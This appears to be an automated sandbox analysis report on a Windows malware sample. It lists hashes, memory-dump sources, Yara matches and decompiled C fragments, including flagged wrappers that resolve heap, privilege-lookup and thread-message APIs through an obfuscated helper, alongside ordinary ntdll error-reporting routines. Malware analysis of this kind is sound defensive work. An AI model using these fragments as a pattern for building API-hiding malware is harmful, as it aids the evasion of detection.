                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c47d6c3b0e97bed3068f76e7998843a38c81fa8678159c59e12db56fb836792a
                                                                          • Instruction ID: 0b4438ae1572c1a27c710c3940376a707b68b55eb5d9502920576c13df00bb7a
                                                                          • Opcode Fuzzy Hash: c47d6c3b0e97bed3068f76e7998843a38c81fa8678159c59e12db56fb836792a
                                                                          • Instruction Fuzzy Hash: 4F90027131114402D1107599C805B071009A7D1241F51C511E081455CDC6D588917172
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 98b7acbed939ebdb4d89e006bbbb154b4a0bfa24226dc35707683fc7c5e2a2d7
                                                                          • Instruction ID: 9b33d29d6e32e3e2594e185e737a7d5a4ab698f44214277fcde3567971c68142
                                                                          • Opcode Fuzzy Hash: 98b7acbed939ebdb4d89e006bbbb154b4a0bfa24226dc35707683fc7c5e2a2d7
                                                                          • Instruction Fuzzy Hash: 4E90026130100003D14075999819A075009F7E1341F51D111E0404558CD95588566272
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: de23fe51b1f5ef995b01f94b3986607b7d43140223191a44a7da6a3272f881db
                                                                          • Instruction ID: 85d1879271de3cad2de0b33da10787ca2752ca8e22fb979fd65f70e325a7d486
                                                                          • Opcode Fuzzy Hash: de23fe51b1f5ef995b01f94b3986607b7d43140223191a44a7da6a3272f881db
                                                                          • Instruction Fuzzy Hash: 8D90026921300002D18075999809A0B1009A7D1242F91D515E000555CCC95588696371
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6e2356629cc930c0f9db2735a734bf8c8c5c018449c0c8470a68d2a117a4bdc6
                                                                          • Instruction ID: 9b57d61974be69e9309502535d6b61591f875c3a244f6964f2e6dd1b200b3e93
                                                                          • Opcode Fuzzy Hash: 6e2356629cc930c0f9db2735a734bf8c8c5c018449c0c8470a68d2a117a4bdc6
                                                                          • Instruction Fuzzy Hash: F790027120100802D18075998805A4B1009A7D1341F91C115E0015658DCA558A5977F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c4fc8f6d9f3a0d74c61d72ba5c9f43635fb4ebe5d3f90d3a93376771685b4bef
                                                                          • Instruction ID: 39676ef1e3103e3a29031aedbfb44d65445216ad09692df765b3d9633ec93462
                                                                          • Opcode Fuzzy Hash: c4fc8f6d9f3a0d74c61d72ba5c9f43635fb4ebe5d3f90d3a93376771685b4bef
                                                                          • Instruction Fuzzy Hash: 4B90027120108802D1107599C805B4B1009A7D0341F55C511E441465CDC6D588917171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                          • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                          • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                          • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                          0x00407260
                                                                          0x0040726f
                                                                          0x00407273
                                                                          0x0040727e
                                                                          0x0040728e
                                                                          0x0040729e
                                                                          0x004072a3
                                                                          0x004072aa
                                                                          0x004072ad
                                                                          0x004072ba
                                                                          0x004072bc
                                                                          0x004072be
                                                                          0x004072db
                                                                          0x004072db
                                                                          0x00000000
                                                                          0x004072dd
                                                                          0x004072e2

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                          • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                          • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                          • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184B3, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E004184B3(void* __eax, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t13;

				asm("stc");
				 *((char*)(__edi + 0x2589d498)) = 0x55;
				_t10 = _a4;
				_t5 = _t10 + 0xc74; // 0xc74
				E00418DB0(__edi, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t13;
			}




                                                                          0x004184b3
                                                                          0x004184ba
                                                                          0x004184c3
                                                                          0x004184cf
                                                                          0x004184d7
                                                                          0x004184ed
                                                                          0x004184f1

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 617b87bc62bef9173d23766c959a8444a372d2d6ca38e192de906baa83162e5b
                                                                          • Instruction ID: 146523db50cbd6da9820d1ab3ab298c9a0a9ba25ab73b9abca6627d3912a3ff7
                                                                          • Opcode Fuzzy Hash: 617b87bc62bef9173d23766c959a8444a372d2d6ca38e192de906baa83162e5b
                                                                          • Instruction Fuzzy Hash: 9FE032B1200604ABDB14DF59CC99EE737A8AF88354F058598FA195B392DA30E9188BB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00418611(void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t11;

				asm("sbb eax, 0x1f5b73b3");
				 *((intOrPtr*)(__edi - 0x362c487d)) = es;
				asm("repe enter 0x8b55, 0xec");
				_t8 = _a4;
				E00418DB0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t11;
			}




                                                                          0x00418611
                                                                          0x00418616
                                                                          0x0041861e
                                                                          0x00418623
                                                                          0x0041863a
                                                                          0x00418650
                                                                          0x00418654

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 3b89cd52c9b0e172c0b25d7b7f23b8fe5746573be44306a72ffb909f820a133c
                                                                          • Instruction ID: 5e7f0d7e2f1ab56e1d4e9c424e1e73d8cc350354ca75efaa86a6a5aa798280dd
                                                                          • Opcode Fuzzy Hash: 3b89cd52c9b0e172c0b25d7b7f23b8fe5746573be44306a72ffb909f820a133c
                                                                          • Instruction Fuzzy Hash: 5BE06DB66002146BDB10DF55DC40EEB37A9EF84250F018599FA4C5B381CA34E8108BF8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x004184cf
                                                                          0x004184d7
                                                                          0x004184ed
                                                                          0x004184f1

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x00418497
                                                                          0x004184ad
                                                                          0x004184b1

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x0041863a
                                                                          0x00418650
                                                                          0x00418654

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418447, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 53be6bc90d3d30908575511b83f8c692f690ca984a2cd91784a0cf402b53222b
                                                                          • Instruction ID: a516fb46eb15d4070925b643e21a561bddfb8fb97eac5a8c4ae2b142ea07057e
                                                                          • Opcode Fuzzy Hash: 53be6bc90d3d30908575511b83f8c692f690ca984a2cd91784a0cf402b53222b
                                                                          • Instruction Fuzzy Hash: 52E0C2F91083816BCB00DF24E8808DBBBA4AF91218324454EE8A843742DB31D91ACBB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                          0x00418503
                                                                          0x0041851a
                                                                          0x00418528

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7a1f61e2608f20f113991cf442fcead6b3811246090ddc7f94107c668cadd4bb
                                                                          • Instruction ID: 674437c91f7b4bc844dccaa44361afbe64511b49032fa2e00a488ccab89b1ca8
                                                                          • Opcode Fuzzy Hash: 7a1f61e2608f20f113991cf442fcead6b3811246090ddc7f94107c668cadd4bb
                                                                          • Instruction Fuzzy Hash: B9B02B718010C0C5E601E7A04E08F17390077D0300F12C111D1020240B4338C080F1B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 016EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • The resource is owned shared by %d threads, xrefs: 016EB37E
                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016EB3D6
                                                                          • an invalid address, %p, xrefs: 016EB4CF
                                                                          • <unknown>, xrefs: 016EB27E, 016EB2D1, 016EB350, 016EB399, 016EB417, 016EB48E
                                                                          • The critical section is owned by thread %p., xrefs: 016EB3B9
                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 016EB323
                                                                          • The resource is owned exclusively by thread %p, xrefs: 016EB374
                                                                          • The instruction at %p referenced memory at %p., xrefs: 016EB432
                                                                          • The instruction at %p tried to %s , xrefs: 016EB4B6
                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 016EB39B
                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 016EB2F3
                                                                          • *** Inpage error in %ws:%s, xrefs: 016EB418
                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 016EB47D
                                                                          • *** enter .exr %p for the exception record, xrefs: 016EB4F1
                                                                          • Go determine why that thread has not released the critical section., xrefs: 016EB3C5
                                                                          • This failed because of error %Ix., xrefs: 016EB446
                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 016EB476
                                                                          • a NULL pointer, xrefs: 016EB4E0
                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 016EB48F
                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 016EB484
                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 016EB314
                                                                          • write to, xrefs: 016EB4A6
                                                                          • read from, xrefs: 016EB4AD, 016EB4B2
                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 016EB2DC
                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016EB38F
                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 016EB53F
                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 016EB352
                                                                          • *** then kb to get the faulting stack, xrefs: 016EB51C
                                                                          • *** enter .cxr %p for the context, xrefs: 016EB50D
                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 016EB305
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                          • API String ID: 0-108210295
                                                                          • Opcode ID: fd0e2784da4d164722d2d4cb6658eb63cbd16ce9bae3b3673b8496af5cb4b65c
                                                                          • Instruction ID: c7efa5cbb84c28eb429f5804fdddbe228c5a26a731ff7dc5ed4009c5a7aa5c12
                                                                          • Opcode Fuzzy Hash: fd0e2784da4d164722d2d4cb6658eb63cbd16ce9bae3b3673b8496af5cb4b65c
                                                                          • Instruction Fuzzy Hash: 14812371A42620FFDB21AE4ACC4ED7F3B66EF56A51F00414CF5062B212D3619492CBB6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016F1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 44%
                                                                          			E016F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x16148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0163B150();
				} else {
					E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x172589c);
				E0163B150("Heap error detected at %p (heap handle %p)\n",  *0x17258a0);
				_t27 =  *0x1725898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M016F1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0163B150();
				} else {
					E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0163B150("Error code: %d - %s\n",  *0x1725898);
				_t113 =  *0x17258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0163B150();
					} else {
						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0163B150("Parameter1: %p\n",  *0x17258a4);
				}
				_t115 =  *0x17258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0163B150();
					} else {
						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0163B150("Parameter2: %p\n",  *0x17258a8);
				}
				_t117 =  *0x17258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0163B150();
					} else {
						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0163B150("Parameter3: %p\n",  *0x17258ac);
				}
				_t119 =  *0x17258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0163B150();
					} else {
						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x17258b4);
					E0163B150("Last known valid blocks: before - %p, after - %p\n",  *0x17258b0);
				} else {
					_t120 =  *0x17258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0163B150();
				} else {
					E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0163B150("Stack trace available at %p\n", 0x17258c0);
			}











                                                                          0x016f1c10
                                                                          0x016f1c16
                                                                          0x016f1c1e
                                                                          0x016f1c3d
                                                                          0x016f1c3e
                                                                          0x016f1c20
                                                                          0x016f1c35
                                                                          0x016f1c3a
                                                                          0x016f1c44
                                                                          0x016f1c55
                                                                          0x016f1c5a
                                                                          0x016f1c65
                                                                          0x016f1c67
                                                                          0x00000000
                                                                          0x016f1c6e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x016f1c67
                                                                          0x016f1cdc
                                                                          0x016f1ce5
                                                                          0x016f1d04
                                                                          0x016f1d05
                                                                          0x016f1ce7
                                                                          0x016f1cfc
                                                                          0x016f1d01
                                                                          0x016f1d0b
                                                                          0x016f1d17
                                                                          0x016f1d1f
                                                                          0x016f1d25
                                                                          0x016f1d30
                                                                          0x016f1d4f
                                                                          0x016f1d50
                                                                          0x016f1d32
                                                                          0x016f1d47
                                                                          0x016f1d4c
                                                                          0x016f1d61
                                                                          0x016f1d67
                                                                          0x016f1d68
                                                                          0x016f1d6e
                                                                          0x016f1d79
                                                                          0x016f1d98
                                                                          0x016f1d99
                                                                          0x016f1d7b
                                                                          0x016f1d90
                                                                          0x016f1d95
                                                                          0x016f1daa
                                                                          0x016f1db0
                                                                          0x016f1db1
                                                                          0x016f1db7
                                                                          0x016f1dc2
                                                                          0x016f1de1
                                                                          0x016f1de2
                                                                          0x016f1dc4
                                                                          0x016f1dd9
                                                                          0x016f1dde
                                                                          0x016f1df3
                                                                          0x016f1df9
                                                                          0x016f1dfa
                                                                          0x016f1e00
                                                                          0x016f1e0a
                                                                          0x016f1e13
                                                                          0x016f1e32
                                                                          0x016f1e33
